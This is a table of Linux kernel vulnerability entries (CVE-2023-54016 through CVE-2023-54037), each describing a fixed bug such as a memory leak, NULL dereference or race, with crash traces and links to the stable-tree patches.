| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath12k: Fix memory leak in rx_desc and tx_desc Currently when ath12k_dp_cc_desc_init() is called we allocate memory to rx_descs and tx_descs. In ath12k_dp_cc_cleanup(), during descriptor cleanup rx_descs and tx_descs memory is not freed. This is cause of memory leak. These allocated memory should be freed in ath12k_dp_cc_cleanup. In ath12k_dp_cc_desc_init(), we can save base address of rx_descs and tx_descs. In ath12k_dp_cc_cleanup(), we can free rx_descs and tx_descs memory using their base address. Tested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.0.1-00029-QCAHKSWPL_SILICONZ-1 | 2025-12-24 | not yet calculated | CVE-2023-54016 | https://git.kernel.org/stable/c/e16be2d34883eecfe7fd888fcdb76c7a5db5d187 https://git.kernel.org/stable/c/afb522b36e76acaa9f8fc06d0a9742d841c47c16 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: powerpc/pseries: fix possible memory leak in ibmebus_bus_init() If device_register() returns error in ibmebus_bus_init(), name of kobject which is allocated in dev_set_name() called in device_add() is leaked. As comment of device_add() says, it should call put_device() to drop the reference count that was set in device_initialize() when it fails, so the name can be freed in kobject_cleanup(). | 2025-12-24 | not yet calculated | CVE-2023-54017 | https://git.kernel.org/stable/c/e4ff88548defafb1ef84facd9856ec252da7b008 https://git.kernel.org/stable/c/3cc4c2f6c266fe5b33a7fa797f31e8b3f06ce58c https://git.kernel.org/stable/c/7ffe14fce7425c32e735bdc44bce425f18976a49 https://git.kernel.org/stable/c/9f3b2b666833ebef6d0ce5a40e189f38e70342a1 https://git.kernel.org/stable/c/d35e7ae10eb8917883da2a0b1823c620a1be42d6 https://git.kernel.org/stable/c/96f27ff732208dce6468016e7a7d5032bd1bfc23 https://git.kernel.org/stable/c/ebd8dc974fcc59e2851a0d89ee7935b55142dc8e https://git.kernel.org/stable/c/afda85b963c12947e298ad85d757e333aa40fd74 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/hdmi: Add missing check for alloc_ordered_workqueue Add check for the return value of alloc_ordered_workqueue as it may return NULL pointer and cause NULL pointer dereference in `hdmi_hdcp.c` and `hdmi_hpd.c`. Patchwork: https://patchwork.freedesktop.org/patch/517211/ | 2025-12-24 | not yet calculated | CVE-2023-54018 | https://git.kernel.org/stable/c/b479485b24da1d572a0ce875537af31b02d2f915 https://git.kernel.org/stable/c/392f7eb3946ab3780b931af723033e19f82c9134 https://git.kernel.org/stable/c/fc34608fa275fe6b3b17e171b63b8ca3aa1cbf09 https://git.kernel.org/stable/c/1bab31a0969ca4ac90907a5d3b44af104229eafd https://git.kernel.org/stable/c/9a01ecc312e764ec4527ad49105a3ca799f1860c https://git.kernel.org/stable/c/e55f93d674314f2fb69eba0dc24acfdf72805611 https://git.kernel.org/stable/c/ae5ca116a0c0ba9fc4123b1f1ec3c4f4d0d01b3f https://git.kernel.org/stable/c/afe4cb96153a0d8003e4e4ebd91b5c543e10df84 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: sched/psi: use kernfs polling functions for PSI trigger polling Destroying psi trigger in cgroup_file_release causes UAF issues when a cgroup is removed from under a polling process. This is happening because cgroup removal causes a call to cgroup_file_release while the actual file is still alive. Destroying the trigger at this point would also destroy its waitqueue head and if there is still a polling process on that file accessing the waitqueue, it will step on the freed pointer: do_select vfs_poll do_rmdir cgroup_rmdir kernfs_drain_open_files cgroup_file_release cgroup_pressure_release psi_trigger_destroy wake_up_pollfree(&t->event_wait) // vfs_poll is unblocked synchronize_rcu kfree(t) poll_freewait -> UAF access to the trigger's waitqueue head Patch [1] fixed this issue for epoll() case using wake_up_pollfree(), however the same issue exists for synchronous poll() case. The root cause of this issue is that the lifecycles of the psi trigger's waitqueue and of the file associated with the trigger are different. Fix this by using kernfs_generic_poll function when polling on cgroup-specific psi triggers. It internally uses kernfs_open_node->poll waitqueue head with its lifecycle tied to the file's lifecycle. This also renders the fix in [1] obsolete, so revert it. [1] commit c2dbe32d5db5 ("sched/psi: Fix use-after-free in ep_remove_wait_queue()") | 2025-12-24 | not yet calculated | CVE-2023-54019 | https://git.kernel.org/stable/c/92cc0153324b6ae8577a39f5bf2cd83c9a34ea6a https://git.kernel.org/stable/c/d124ab17024cc85a1079b7810a018a497ebc13da https://git.kernel.org/stable/c/aff037078ecaecf34a7c2afab1341815f90fba5e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dmaengine: sf-pdma: pdma_desc memory leak fix Commit b2cc5c465c2c ("dmaengine: sf-pdma: Add multithread support for a DMA channel") changed sf_pdma_prep_dma_memcpy() to unconditionally allocate a new sf_pdma_desc each time it is called. The driver previously recycled descs, by checking the in_use flag, only allocating additional descs if the existing one was in use. This logic was removed in commit b2cc5c465c2c ("dmaengine: sf-pdma: Add multithread support for a DMA channel"), but sf_pdma_free_desc() was not changed to handle the new behaviour. As a result, each time sf_pdma_prep_dma_memcpy() is called, the previous descriptor is leaked, over time leading to memory starvation: unreferenced object 0xffffffe008447300 (size 192): comm "irq/39-mchp_dsc", pid 343, jiffies 4294906910 (age 981.200s) hex dump (first 32 bytes): 00 00 00 ff 00 00 00 00 b8 c1 00 00 00 00 00 00 ................ 00 00 70 08 10 00 00 00 00 00 00 c0 00 00 00 00 ..p............. backtrace: [<00000000064a04f4>] kmemleak_alloc+0x1e/0x28 [<00000000018927a7>] kmem_cache_alloc+0x11e/0x178 [<000000002aea8d16>] sf_pdma_prep_dma_memcpy+0x40/0x112 Add the missing kfree() to sf_pdma_free_desc(), and remove the redundant in_use flag. | 2025-12-24 | not yet calculated | CVE-2023-54020 | https://git.kernel.org/stable/c/ad222c9af25e3f074c180e389b3477dce42afc4f https://git.kernel.org/stable/c/03fece43fa109beba7cc9948c02f5e2d1205d607 https://git.kernel.org/stable/c/8bd5040bd43f2b5ba3c898b09a3197a0c7ace126 https://git.kernel.org/stable/c/b02e07015a5ac7bbc029da931ae17914b8ae0339 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: set goal start correctly in ext4_mb_normalize_request We need to set ac_g_ex to notify the goal start used in ext4_mb_find_by_goal. Set ac_g_ex instead of ac_f_ex in ext4_mb_normalize_request. Besides we should assure goal start is in range [first_data_block, blocks_count) as ext4_mb_initialize_context does. [ Added a check to make sure size is less than ar->pright; otherwise we could end up passing an underflowed value of ar->pright - size to ext4_get_group_no_and_offset(), which will trigger a BUG_ON later on. - TYT ] | 2025-12-24 | not yet calculated | CVE-2023-54021 | https://git.kernel.org/stable/c/2479bb6cbdb4d56b807bbe5229e3e26a6f1f4530 https://git.kernel.org/stable/c/390eee955d4de4662db5e3e9e9a9eae020432cb7 https://git.kernel.org/stable/c/cee78217a7ae72d11c2e21e1a5263b8044489823 https://git.kernel.org/stable/c/3ca3005b502ca8ea87d6a344323b179b48c4e4a3 https://git.kernel.org/stable/c/bc4a3e1d07a86ae5845321d371190244acacb2f2 https://git.kernel.org/stable/c/c6bee8970075b256fc1b07bf4873049219380818 https://git.kernel.org/stable/c/abb330ffaa3a0ae7ce632e28c9260b461c01f19f https://git.kernel.org/stable/c/b07ffe6927c75d99af534d685282ea188d9f71a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Fix potential memory leaks at error path for UMP open The allocation and initialization errors at alloc_midi_urbs() that is called at MIDI 2.0 / UMP device are supposed to be handled at the caller side by invoking free_midi_urbs(). However, free_midi_urbs() loops only for ep->num_urbs entries, and since ep->num_entries wasn't updated yet at the allocation / init error in alloc_midi_urbs(), this entry won't be released. The intention of free_midi_urbs() is to release the whole elements, so change the loop size to NUM_URBS to scan over all elements for fixing the missed releases. Also, the call of free_midi_urbs() is missing at snd_usb_midi_v2_open(). Although it'll be released later at reopen/close or disconnection, it's better to release immediately at the error path. | 2025-12-24 | not yet calculated | CVE-2023-54022 | https://git.kernel.org/stable/c/f819b343aa95d24d5f7d6e06660c7f62591abc5f https://git.kernel.org/stable/c/b1757fa30ef14f254f4719bf6f7d54a4c8207216 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix race between balance and cancel/pause Syzbot reported a panic that looks like this: assertion failed: fs_info->exclusive_operation == BTRFS_EXCLOP_BALANCE_PAUSED, in fs/btrfs/ioctl.c:465 ------------[ cut here ]------------ kernel BUG at fs/btrfs/messages.c:259! RIP: 0010:btrfs_assertfail+0x2c/0x30 fs/btrfs/messages.c:259 Call Trace: <TASK> btrfs_exclop_balance fs/btrfs/ioctl.c:465 [inline] btrfs_ioctl_balance fs/btrfs/ioctl.c:3564 [inline] btrfs_ioctl+0x531e/0x5b30 fs/btrfs/ioctl.c:4632 vfs_ioctl fs/ioctl.c:51 [inline] __do_sys_ioctl fs/ioctl.c:870 [inline] __se_sys_ioctl fs/ioctl.c:856 [inline] __x64_sys_ioctl+0x197/0x210 fs/ioctl.c:856 do_syscall_x64 arch/x86/entry/common.c:50 [inline] do_syscall_64+0x39/0xb0 arch/x86/entry/common.c:80 entry_SYSCALL_64_after_hwframe+0x63/0xcd The reproducer is running a balance and a cancel or pause in parallel. The way balance finishes is a bit wonky, if we were paused we need to save the balance_ctl in the fs_info, but clear it otherwise and cleanup. However we rely on the return values being specific errors, or having a cancel request or no pause request. If balance completes and returns 0, but we have a pause or cancel request we won't do the appropriate cleanup, and then the next time we try to start a balance we'll trip this ASSERT. The error handling is just wrong here, we always want to clean up, unless we got -ECANCELLED and we set the appropriate pause flag in the exclusive op. With this patch the reproducer ran for an hour without tripping, previously it would trip in less than a few minutes. | 2025-12-24 | not yet calculated | CVE-2023-54023 | https://git.kernel.org/stable/c/ddf7e8984c83aee9122552529f4e77291903f8d9 https://git.kernel.org/stable/c/72efe5d44821e38540888a5fe3ff3d0faab6acad https://git.kernel.org/stable/c/b19c98f237cd76981aaded52c258ce93f7daa8cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: Destroy target device if coalesced MMIO unregistration fails Destroy and free the target coalesced MMIO device if unregistering said device fails. As clearly noted in the code, kvm_io_bus_unregister_dev() does not destroy the target device. BUG: memory leak unreferenced object 0xffff888112a54880 (size 64): comm "syz-executor.2", pid 5258, jiffies 4297861402 (age 14.129s) hex dump (first 32 bytes): 38 c7 67 15 00 c9 ff ff 38 c7 67 15 00 c9 ff ff 8.g.....8.g..... e0 c7 e1 83 ff ff ff ff 00 30 67 15 00 c9 ff ff .........0g..... backtrace: [<0000000006995a8a>] kmalloc include/linux/slab.h:556 [inline] [<0000000006995a8a>] kzalloc include/linux/slab.h:690 [inline] [<0000000006995a8a>] kvm_vm_ioctl_register_coalesced_mmio+0x8e/0x3d0 arch/x86/kvm/../../../virt/kvm/coalesced_mmio.c:150 [<00000000022550c2>] kvm_vm_ioctl+0x47d/0x1600 arch/x86/kvm/../../../virt/kvm/kvm_main.c:3323 [<000000008a75102f>] vfs_ioctl fs/ioctl.c:46 [inline] [<000000008a75102f>] file_ioctl fs/ioctl.c:509 [inline] [<000000008a75102f>] do_vfs_ioctl+0xbab/0x1160 fs/ioctl.c:696 [<0000000080e3f669>] ksys_ioctl+0x76/0xa0 fs/ioctl.c:713 [<0000000059ef4888>] __do_sys_ioctl fs/ioctl.c:720 [inline] [<0000000059ef4888>] __se_sys_ioctl fs/ioctl.c:718 [inline] [<0000000059ef4888>] __x64_sys_ioctl+0x6f/0xb0 fs/ioctl.c:718 [<000000006444fa05>] do_syscall_64+0x9f/0x4e0 arch/x86/entry/common.c:290 [<000000009a4ed50b>] entry_SYSCALL_64_after_hwframe+0x49/0xbe BUG: leak checking failed | 2025-12-24 | not yet calculated | CVE-2023-54024 | https://git.kernel.org/stable/c/10c2a20d73e99463e69b7e92706791656adc16d7 https://git.kernel.org/stable/c/76a9886e1b61ce5592df5ae78a19ed30399ae189 https://git.kernel.org/stable/c/999439fd5da5a76253e2f2c37b94204f47d75491 https://git.kernel.org/stable/c/ccf6a7fb1aedb1472e1241ee55e4d26b68f8d066 https://git.kernel.org/stable/c/fb436dd6914325075f07d19851ab277b7a693ae7 https://git.kernel.org/stable/c/b1cb1fac22abf102ffeb29dd3eeca208a3869d54 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rsi: Do not configure WoWlan in shutdown hook if not enabled In case WoWlan was never configured during the operation of the system, the hw->wiphy->wowlan_config will be NULL. rsi_config_wowlan() checks whether wowlan_config is non-NULL and if it is not, then WARNs about it. The warning is valid, as during normal operation the rsi_config_wowlan() should only ever be called with non-NULL wowlan_config. In shutdown this rsi_config_wowlan() should only ever be called if WoWlan was configured before by the user. Add checks for non-NULL wowlan_config into the shutdown hook. While at it, check whether the wiphy is also non-NULL before accessing wowlan_config . Drop the single-use wowlan_config variable, just inline it into function call. | 2025-12-24 | not yet calculated | CVE-2023-54025 | https://git.kernel.org/stable/c/b2aeb97fd470206e67f7b3b4a3e68212a13f747b https://git.kernel.org/stable/c/4391fa180856ff84a2cef4a92694a689eebb855e https://git.kernel.org/stable/c/eb205a06908122f50b1dd1baa43f7c8036bfc7dc https://git.kernel.org/stable/c/1b51236aa49a0564280bd45c94118cab6d9b0fbd https://git.kernel.org/stable/c/b601468539c1d97539097bfc87ad11f1704b7eb7 https://git.kernel.org/stable/c/b241e260820b68c09586e8a0ae0fc23c0e3215bd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: opp: Fix use-after-free in lazy_opp_tables after probe deferral When dev_pm_opp_of_find_icc_paths() in _allocate_opp_table() returns -EPROBE_DEFER, the opp_table is freed again, to wait until all the interconnect paths are available. However, if the OPP table is using required-opps then it may already have been added to the global lazy_opp_tables list. The error path does not remove the opp_table from the list again. This can cause crashes later when the provider of the required-opps is added, since we will iterate over OPP tables that have already been freed. E.g.: Unable to handle kernel NULL pointer dereference when read CPU: 0 PID: 7 Comm: kworker/0:0 Not tainted 6.4.0-rc3 PC is at _of_add_opp_table_v2 (include/linux/of.h:949 drivers/opp/of.c:98 drivers/opp/of.c:344 drivers/opp/of.c:404 drivers/opp/of.c:1032) -> lazy_link_required_opp_table() Fix this by calling _of_clear_opp_table() to remove the opp_table from the list and clear other allocated resources. While at it, also add the missing mutex_destroy() calls in the error path. | 2025-12-24 | not yet calculated | CVE-2023-54026 | https://git.kernel.org/stable/c/39a0e723d3502f6dc4c603f57ebe8dc7bcc4a4bc https://git.kernel.org/stable/c/76ab057de777723ec924654502d1a260ba7d7d54 https://git.kernel.org/stable/c/c05e76d6b249e5254c31994eedd06dd3cc90dee0 https://git.kernel.org/stable/c/b2a2ab039bd58f51355e33d7d3fc64605d7f870d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: core: Prevent invalid memory access when there is no parent Commit 813665564b3d ("iio: core: Convert to use firmware node handle instead of OF node") switched the kind of nodes to use for label retrieval in device registration. Probably an unwanted change in that commit was that if the device has no parent then NULL pointer is accessed. This is what happens in the stock IIO dummy driver when a new entry is created in configfs: # mkdir /sys/kernel/config/iio/devices/dummy/foo BUG: kernel NULL pointer dereference, address: ... ... Call Trace: __iio_device_register iio_dummy_probe Since there seems to be no reason to make a parent device of an IIO dummy device mandatory, let's prevent the invalid memory access in __iio_device_register when the parent device is NULL. With this change, the IIO dummy driver works fine with configfs. | 2025-12-24 | not yet calculated | CVE-2023-54027 | https://git.kernel.org/stable/c/312f04ede209f0a186799fe8e64a19b49700d5dc https://git.kernel.org/stable/c/a4b34cccff14ce74bb7d77fbfd56e7c9d7c28a97 https://git.kernel.org/stable/c/b2a69969908fcaf68596dfc04369af0fe2e1d2f7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix the error "trying to register non-static key in rxe_cleanup_task" In the function rxe_create_qp(), rxe_qp_from_init() is called to initialize qp, internally things like rxe_init_task are not setup until rxe_qp_init_req(). If an error occurred before this point then the unwind will call rxe_cleanup() and eventually to rxe_qp_do_cleanup()/rxe_cleanup_task() which will oops when trying to access the uninitialized spinlock. If rxe_init_task is not executed, rxe_cleanup_task will not be called. | 2025-12-24 | not yet calculated | CVE-2023-54028 | https://git.kernel.org/stable/c/3236221bb8e4de8e3d0c8385f634064fb26b8e38 https://git.kernel.org/stable/c/c8473cd5b301279a41dc75e5afb26b3d5223b6c7 https://git.kernel.org/stable/c/0d938264fcfe4927e54f0e519da05af1d5d720b4 https://git.kernel.org/stable/c/b2b1ddc457458fecd1c6f385baa9fbda5f0c63ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: fix iwl_mvm_max_amsdu_size() for MLO For MLO, we cannot use vif->bss_conf.chandef.chan->band, since that will lead to a NULL-ptr dereference as bss_conf isn't used. However, in case of real MLO, we also need to take both LMACs into account if they exist, since the station might be active on both LMACs at the same time. | 2025-12-24 | not yet calculated | CVE-2023-54029 | https://git.kernel.org/stable/c/63e2d06adf6b0842132ba89efdf8fada5f7ff1ac https://git.kernel.org/stable/c/4489aa868bc6343afdaf5ef324af5b1f64962b25 https://git.kernel.org/stable/c/b2bc600cced23762d4e97db8989b18772145604f |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io_uring/net: don't overflow multishot recv Don't allow overflowing multishot recv CQEs, it might get out of hand, hurt performance, and in the worst case scenario OOM the task. | 2025-12-24 | not yet calculated | CVE-2023-54030 | https://git.kernel.org/stable/c/1e2db9837be7d24a2a74eb3f3906d0872bee8907 https://git.kernel.org/stable/c/b2e74db55dd93d6db22a813c9a775b5dbf87c560 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: vdpa: Add queue index attr to vdpa_nl_policy for nlattr length check The vdpa_nl_policy structure is used to validate the nlattr when parsing the incoming nlmsg. It will ensure the attribute being described produces a valid nlattr pointer in info->attrs before entering into each handler in vdpa_nl_ops. That is to say, the missing part in vdpa_nl_policy may lead to illegal nlattr after parsing, which could lead to OOB read just like CVE-2023-3773. This patch adds the missing nla_policy for vdpa queue index attr to avoid such bugs. | 2025-12-24 | not yet calculated | CVE-2023-54031 | https://git.kernel.org/stable/c/8ad9bc25cbdcec72e7ca43dd8281decb69ea9a70 https://git.kernel.org/stable/c/ccb533b7070aeeb65c66ea5d590e9c62421dcd61 https://git.kernel.org/stable/c/b3003e1b54e057f5f3124e437b80c3bef26ed3fe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: fix race when deleting quota root from the dirty cow roots list When disabling quotas we are deleting the quota root from the list fs_info->dirty_cowonly_roots without taking the lock that protects it, which is struct btrfs_fs_info::trans_lock. This unsynchronized list manipulation may cause chaos if there's another concurrent manipulation of this list, such as when adding a root to it with ctree.c:add_root_to_dirty_list(). This can result in all sorts of weird failures caused by a race, such as the following crash: [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1 [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014 [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs] [337571.279928] Code: 85 38 06 00 (...) [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206 [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000 [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070 [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600 [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48 [337571.281723] FS: 00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000 [337571.281950] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0 [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [337571.282874] Call Trace: [337571.283101] <TASK> [337571.283327] ? __die_body+0x1b/0x60 [337571.283570] ? die_addr+0x39/0x60 [337571.283796] ? exc_general_protection+0x22e/0x430 [337571.284022] ? asm_exc_general_protection+0x22/0x30 [337571.284251] ? commit_cowonly_roots+0x11f/0x250 [btrfs] [337571.284531] btrfs_commit_transaction+0x42e/0xf90 [btrfs] [337571.284803] ? _raw_spin_unlock+0x15/0x30 [337571.285031] ? release_extent_buffer+0x103/0x130 [btrfs] [337571.285305] reset_balance_state+0x152/0x1b0 [btrfs] [337571.285578] btrfs_balance+0xa50/0x11e0 [btrfs] [337571.285864] ? __kmem_cache_alloc_node+0x14a/0x410 [337571.286086] btrfs_ioctl+0x249a/0x3320 [btrfs] [337571.286358] ? mod_objcg_state+0xd2/0x360 [337571.286577] ? refill_obj_stock+0xb0/0x160 [337571.286798] ? seq_release+0x25/0x30 [337571.287016] ? __rseq_handle_notify_resume+0x3ba/0x4b0 [337571.287235] ? percpu_counter_add_batch+0x2e/0xa0 [337571.287455] ? __x64_sys_ioctl+0x88/0xc0 [337571.287675] __x64_sys_ioctl+0x88/0xc0 [337571.287901] do_syscall_64+0x38/0x90 [337571.288126] entry_SYSCALL_64_after_hwframe+0x72/0xdc [337571.288352] RIP: 0033:0x7f478aaffe9b So fix this by locking struct btrfs_fs_info::trans_lock before deleting the quota root from that list. | 2025-12-24 | not yet calculated | CVE-2023-54032 | https://git.kernel.org/stable/c/365f318da7384cbac5de6b9c098914888a4d63e7 https://git.kernel.org/stable/c/6da229754099518cfa27cbfcd0fd042618785fad https://git.kernel.org/stable/c/679c34821ab7cd93c8ccb96fbf57fc44848a78bc https://git.kernel.org/stable/c/6819bb0b8552dcc5f82ca606c8911b8c67e0628f https://git.kernel.org/stable/c/7ba0da31dd4a8fd24d416016c538a95a5664ff02 https://git.kernel.org/stable/c/a53d78d9a8551e72c46ded23e8b0a56e55d32032 https://git.kernel.org/stable/c/a5cdc4012efa808e07d073c11dc2f366b5394ad3 https://git.kernel.org/stable/c/b31cb5a6eb7a48b0a7bfdf06832b1fd5088d8c79 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: fix a memory leak in the LRU and LRU_PERCPU hash maps The LRU and LRU_PERCPU maps allocate a new element on update before locking the target hash table bucket. Right after that the maps try to lock the bucket. If this fails, then maps return -EBUSY to the caller without releasing the allocated element. This makes the element untracked: it doesn't belong to either of free lists, and it doesn't belong to the hash table, so can't be re-used; this eventually leads to the permanent -ENOMEM on LRU map updates, which is unexpected. Fix this by returning the element to the local free list if bucket locking fails. | 2025-12-24 | not yet calculated | CVE-2023-54033 | https://git.kernel.org/stable/c/79ea1a12fb9a8275b6e19d4ca625dd872dedcbb9 https://git.kernel.org/stable/c/1a9e80f757bbb1562d82e350afce2bb2f712cc3d https://git.kernel.org/stable/c/965e9cccbe6b9c7b379908cebcb5e3a47f20dd5e https://git.kernel.org/stable/c/b34ffb0c6d23583830f9327864b9c1f486003305 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommufd: Make sure to zero vfio_iommu_type1_info before copying to user Missed a zero initialization here. Most of the struct is filled with a copy_from_user(), however minsz for that copy is smaller than the actual struct by 8 bytes, thus we don't fill the padding. | 2025-12-24 | not yet calculated | CVE-2023-54034 | https://git.kernel.org/stable/c/7adcec686e4d699c169d34c722132b2bce5232cb https://git.kernel.org/stable/c/b3551ead616318ea155558cdbe7e91495b8d9b33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix underflow in chain reference counter Set element addition error path decrements reference counter on chains twice: once on element release and again via nft_data_release(). Then, d6b478666ffa ("netfilter: nf_tables: fix underflow in object reference counter") incorrectly fixed this by removing the stateful object reference count decrement. Restore the stateful object decrement as in b91d90368837 ("netfilter: nf_tables: fix leaking object reference count") and let nft_data_release() decrement the chain reference counter, so this is done only once. | 2025-12-24 | not yet calculated | CVE-2023-54035 | https://git.kernel.org/stable/c/b068314fd8ce751a7f906e55bb90f3551815f1a0 https://git.kernel.org/stable/c/9c959671abc7d4ffdf34eed10c64492d43cb6a3c https://git.kernel.org/stable/c/b389139f12f287b8ed2e2628b72df89a081f0b59 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: rtl8xxxu: Fix memory leaks with RTL8723BU, RTL8192EU The wifi + bluetooth combo chip RTL8723BU can leak memory (especially?) when it's connected to a bluetooth audio device. The busy bluetooth traffic generates lots of C2H (card to host) messages, which are not freed correctly. To fix this, move the dev_kfree_skb() call in rtl8xxxu_c2hcmd_callback() inside the loop where skb_dequeue() is called. The RTL8192EU leaks memory because the C2H messages are added to the queue and left there forever. (This was fine in the past because it probably wasn't sending any C2H messages until commit e542e66b7c2e ("wifi: rtl8xxxu: gen2: Turn on the rate control"). Since that commit it sends a C2H message when the TX rate changes.) To fix this, delete the check for rf_paths > 1 and the goto. Let the function process the C2H messages from RTL8192EU like the ones from the other chips. Theoretically the RTL8188FU could also leak like RTL8723BU, but it most likely doesn't send C2H messages frequently enough. This change was tested with RTL8723BU by Erhard F. I tested it with RTL8188FU and RTL8192EU. | 2025-12-24 | not yet calculated | CVE-2023-54036 | https://git.kernel.org/stable/c/430f9f9bec53a75f9ccc53e156a66f13fc098b83 https://git.kernel.org/stable/c/35fb0e275af1aa1ca0a9784417e90f988aaf8e78 https://git.kernel.org/stable/c/93c3f34ec02fc81188d328287d4fddd498ccddea https://git.kernel.org/stable/c/f39a86b4efd270947ee252cc32a30b0aef492d65 https://git.kernel.org/stable/c/b39f662ce1648db0b9de32e6a849b098480793cb |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ice: prevent NULL pointer deref during reload Calling ethtool during reload can lead to call trace, because VSI isn't configured for some time, but netdev is alive. To fix it add rtnl lock for VSI deconfig and config. Set ::num_q_vectors to 0 after freeing and add a check for ::tx/rx_rings in ring related ethtool ops. Add proper unroll of filters in ice_start_eth(). Reproduction: $watch -n 0.1 -d 'ethtool -g enp24s0f0np0' $devlink dev reload pci/0000:18:00.0 action driver_reinit Call trace before fix: [66303.926205] BUG: kernel NULL pointer dereference, address: 0000000000000000 [66303.926259] #PF: supervisor read access in kernel mode [66303.926286] #PF: error_code(0x0000) - not-present page [66303.926311] PGD 0 P4D 0 [66303.926332] Oops: 0000 [#1] PREEMPT SMP PTI [66303.926358] CPU: 4 PID: 933821 Comm: ethtool Kdump: loaded Tainted: G OE 6.4.0-rc5+ #1 [66303.926400] Hardware name: Intel Corporation S2600WFT/S2600WFT, BIOS SE5C620.86B.00.01.0014.070920180847 07/09/2018 [66303.926446] RIP: 0010:ice_get_ringparam+0x22/0x50 [ice] [66303.926649] Code: 90 90 90 90 90 90 90 90 f3 0f 1e fa 0f 1f 44 00 00 48 8b 87 c0 09 00 00 c7 46 04 e0 1f 00 00 c7 46 10 e0 1f 00 00 48 8b 50 20 <48> 8b 12 0f b7 52 3a 89 56 14 48 8b 40 28 48 8b 00 0f b7 40 58 48 [66303.926722] RSP: 0018:ffffad40472f39c8 EFLAGS: 00010246 [66303.926749] RAX: ffff98a8ada05828 RBX: ffff98a8c46dd060 RCX: ffffad40472f3b48 [66303.926781] RDX: 0000000000000000 RSI: ffff98a8c46dd068 RDI: ffff98a8b23c4000 [66303.926811] RBP: ffffad40472f3b48 R08: 00000000000337b0 R09: 0000000000000000 [66303.926843] R10: 0000000000000001 R11: 0000000000000100 R12: ffff98a8b23c4000 [66303.926874] R13: ffff98a8c46dd060 R14: 000000000000000f R15: ffffad40472f3a50 [66303.926906] FS: 00007f6397966740(0000) GS:ffff98b390900000(0000) knlGS:0000000000000000 [66303.926941] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [66303.926967] CR2: 0000000000000000 CR3: 000000011ac20002 CR4: 00000000007706e0 [66303.926999] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 [66303.927029] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 [66303.927060] PKRU: 55555554 [66303.927075] Call Trace: [66303.927094] <TASK> [66303.927111] ? __die+0x23/0x70 [66303.927140] ? page_fault_oops+0x171/0x4e0 [66303.927176] ? exc_page_fault+0x7f/0x180 [66303.927209] ? asm_exc_page_fault+0x26/0x30 [66303.927244] ? ice_get_ringparam+0x22/0x50 [ice] [66303.927433] rings_prepare_data+0x62/0x80 [66303.927469] ethnl_default_doit+0xe2/0x350 [66303.927501] genl_family_rcv_msg_doit.isra.0+0xe3/0x140 [66303.927538] genl_rcv_msg+0x1b1/0x2c0 [66303.927561] ? __pfx_ethnl_default_doit+0x10/0x10 [66303.927590] ? __pfx_genl_rcv_msg+0x10/0x10 [66303.927615] netlink_rcv_skb+0x58/0x110 [66303.927644] genl_rcv+0x28/0x40 [66303.927665] netlink_unicast+0x19e/0x290 [66303.927691] netlink_sendmsg+0x254/0x4d0 [66303.927717] sock_sendmsg+0x93/0xa0 [66303.927743] __sys_sendto+0x126/0x170 [66303.927780] __x64_sys_sendto+0x24/0x30 [66303.928593] do_syscall_64+0x5d/0x90 [66303.929370] ? __count_memcg_events+0x60/0xa0 [66303.930146] ? count_memcg_events.constprop.0+0x1a/0x30 [66303.930920] ? handle_mm_fault+0x9e/0x350 [66303.931688] ? do_user_addr_fault+0x258/0x740 [66303.932452] ? exc_page_fault+0x7f/0x180 [66303.933193] entry_SYSCALL_64_after_hwframe+0x72/0xdc | 2025-12-24 | not yet calculated | CVE-2023-54037 | https://git.kernel.org/stable/c/ca03b327224ed6be2d07f42ee6ee1cdd586cfd5b 